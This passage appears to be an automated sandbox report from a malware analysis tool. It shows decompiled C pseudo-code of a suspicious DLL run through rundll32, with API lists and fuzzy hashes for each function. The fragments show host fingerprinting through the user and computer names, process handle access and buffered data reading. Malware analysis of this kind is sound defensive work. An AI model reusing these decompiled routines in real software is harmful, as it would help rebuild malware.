                                          					if(E043574B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d0435c0
                                          							E04354C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E0435147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E0435147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x435d33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}
























                                          APIs
                                          • StrChrA.SHLWAPI(0435553C,0000005F,00000000,00000000,00000104), ref: 0435A675
                                          • memcpy.NTDLL(?,0435553C,?), ref: 0435A68E
                                          • lstrcpy.KERNEL32(?), ref: 0435A6A4
                                            • Part of subcall function 0435A5E9: lstrlen.KERNEL32(?,00000000,0435D330,00000001,0435937A,0435D00C,0435D00C,00000000,00000005,00000000,00000000,?,?,?,0435207E,?), ref: 0435A5F2
                                            • Part of subcall function 0435A5E9: mbstowcs.NTDLL ref: 0435A619
                                            • Part of subcall function 0435A5E9: memset.NTDLL ref: 0435A62B
                                            • Part of subcall function 04351BC1: lstrlenW.KERNEL32(0435553C,?,?,0435A818,3D0435C0,80000002,0435553C,04359642,74666F53,4D4C4B48,04359642,?,3D0435C0,80000002,0435553C,?), ref: 04351BE1
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 0435A6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: be44316e7091f3d9b2d26855e73217de915a092113f595b84d90b0371c643635
                                          • Instruction ID: 3516f3c608d2bce57e10c404fc09dd25494cf507dc524d41b40d456444199e9b
                                          • Opcode Fuzzy Hash: be44316e7091f3d9b2d26855e73217de915a092113f595b84d90b0371c643635
                                          • Instruction Fuzzy Hash: 84513B7250020AEFEF11AFA0DD40EAA7BBDEF08308F14A615FD1596570E735E926EB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0435614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E043558BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E0435147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x4355210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}
















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,0435520E), ref: 0435615E
                                          • GetComputerNameW.KERNEL32(00000000,0435520E), ref: 0435617A
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • GetUserNameW.ADVAPI32(00000000,0435520E), ref: 043561B4
                                          • GetComputerNameW.KERNEL32(0435520E,?), ref: 043561D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,0435520E,00000000,04355210,00000000,00000000,?,?,0435520E), ref: 043561FA
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 8a13f57c8fb67d78f8ef28ecfc21f234b6bc04a52202dcac89216ce90a12d9c9
                                          • Instruction ID: 22a29990062207e95c250c1260d78bd3f41ad102fc984f408cf09396681c7a07
                                          • Opcode Fuzzy Hash: 8a13f57c8fb67d78f8ef28ecfc21f234b6bc04a52202dcac89216ce90a12d9c9
                                          • Instruction Fuzzy Hash: B021E8B6900208FFDB11DFE8D985DEEBBBCEF48304B5054AAE905E7210E634AB44DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E043562CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x435d114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x435d238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

















                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04356301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0435632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04356341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04356350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 0435636B
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 77016cf4e36a169dcd67e99cedf6af05b5469569a55451888e3b37b9ee81b0f1
                                          • Instruction ID: 03006e899a5207321ee4c81f02d9760b27e8d9cb2e7b001f0a8ecc4df10ae08e
                                          • Opcode Fuzzy Hash: 77016cf4e36a169dcd67e99cedf6af05b5469569a55451888e3b37b9ee81b0f1
                                          • Instruction Fuzzy Hash: 38218E76900209AFDB019FA8C845AEEBFB9EF85304F059054FC48AB325C735E915CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04359FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E04356B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E0435A96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x435d12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}








                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A021
                                          • ResetEvent.KERNEL32(?), ref: 0435A026
                                          • GetLastError.KERNEL32 ref: 0435A03E
                                          • GetLastError.KERNEL32(?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A059
                                            • Part of subcall function 04356B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000), ref: 04356B7A
                                            • Part of subcall function 04356B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102,043566AF,?), ref: 04356BD8
                                            • Part of subcall function 04356B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04356BE8
                                          • SetEvent.KERNEL32(?), ref: 0435A04C
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: b04da6594e0c51594bc777662d602172f1b024e92249f6b799e24f88ada10f4e
                                          • Instruction ID: 6834f3c4911d841e26381f60e4ce8fb936d82f38a378e76cc58cb91094f11ac0
                                          • Opcode Fuzzy Hash: b04da6594e0c51594bc777662d602172f1b024e92249f6b799e24f88ada10f4e
                                          • Instruction Fuzzy Hash: 24014B71110310AADB307A61DC44F6BB7ADFF48768F106B24FA51920F0D625F815EA61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04356A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x435d26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x435d25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x435d258 = _t6;
                                          					 *0x435d264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x435d254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x435d254 =  *0x435d254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}










                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,043590D2,?), ref: 04356A87
                                          • GetVersion.KERNEL32 ref: 04356A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04356AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04356ACF
                                          • GetLastError.KERNEL32 ref: 04356AEE
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: e50d2604e0ae2684c58b9050e1dbdd9e881c0d49d139de9e9c021f21ceb131f5
                                          • Instruction ID: d2132c960e790902d9d7f9564c31b37e5753ce2ecf7483866236eee6583f730a
                                          • Opcode Fuzzy Hash: e50d2604e0ae2684c58b9050e1dbdd9e881c0d49d139de9e9c021f21ceb131f5
                                          • Instruction Fuzzy Hash: A2F081B06403429BE7108F74F80AF397B6CE748729F40F11AE94ACB1E0D678D851CB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E043591B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x435d2a4; // 0x251a5a8
                                          					_t5 = _t103 + 0x435e038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x435c298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x435d2a4; // 0x251a5a8
                                          												_t28 = _t109 + 0x435e0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x435d2a4; // 0x251a5a8
                                          														_t33 = _t79 + 0x435e078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}

                                          APIs
                                          • SysAllocString.OLEAUT32(0435C298), ref: 04359205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 043592E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 043592FF
                                          • SysFreeString.OLEAUT32(?), ref: 0435932E
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 770982b9f7b30b7b8b36d2a75f714afa9b6cd8d641bb61e4cc4d1d6cd93c2a36
                                          • Instruction ID: 632f6daee254eb19b0a1fa2ebf04f2b7d8179d3655b26d269a00999747c15757
                                          • Opcode Fuzzy Hash: 770982b9f7b30b7b8b36d2a75f714afa9b6cd8d641bb61e4cc4d1d6cd93c2a36
                                          • Instruction Fuzzy Hash: 17513E75D00619EFCB01DFA8C888DAEB7B9FF89704B149594ED15EB260D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E04357664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E043548F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E0435748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04357074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E04357074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E0435748A(_t101, 0x435d1b0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E0435748A(_a16, _a4);
                                          						E04352FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L0435B088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L0435B082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E04356FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E043515CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E0435687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(0x435d1b0 + _a8 * 4) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}

                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04357711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04357727
                                          • memset.NTDLL ref: 043577C7
                                          • memset.NTDLL ref: 043577D7
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: fc7986436fb3f768c31ec93b56b5b21b5b73d331461e56c61e339b689ace8865
                                          • Instruction ID: ac25fb502f065a52021fdbed9bdbe7c745ccca9f848c2b726e37121368d80877
                                          • Opcode Fuzzy Hash: fc7986436fb3f768c31ec93b56b5b21b5b73d331461e56c61e339b689ace8865
                                          • Instruction Fuzzy Hash: 9E419771A00259ABEB10EFA8DC40FEE7774EF44314F109529FD16A71A0EB71BE448B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 0435A97E
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • ResetEvent.KERNEL32(?), ref: 0435A9F2
                                          • GetLastError.KERNEL32 ref: 0435AA15
                                          • GetLastError.KERNEL32 ref: 0435AAC0
                                            • Part of subcall function 0435147E: HeapFree.KERNEL32(00000000,00000000,04351D11,00000000,?,?,-00000008), ref: 0435148A
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: 4db777a99f4b46a69fb8c4ef21f77dc3b6029ae2fb3ab48fd03b8275b19c4464
                                          • Instruction ID: 453fb6e83e09e7439d15ddfb403ad40ded4109eb0e62bdecbde9c1092e616231
                                          • Opcode Fuzzy Hash: 4db777a99f4b46a69fb8c4ef21f77dc3b6029ae2fb3ab48fd03b8275b19c4464
                                          • Instruction Fuzzy Hash: 44418171500704BFE731AFA5CD48E6B7BBDEF48714F146A19F952D10A0D734AA44DA20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04358F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x435d138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x435d168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E043558BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x435d138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E0435147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E043516DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04359D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
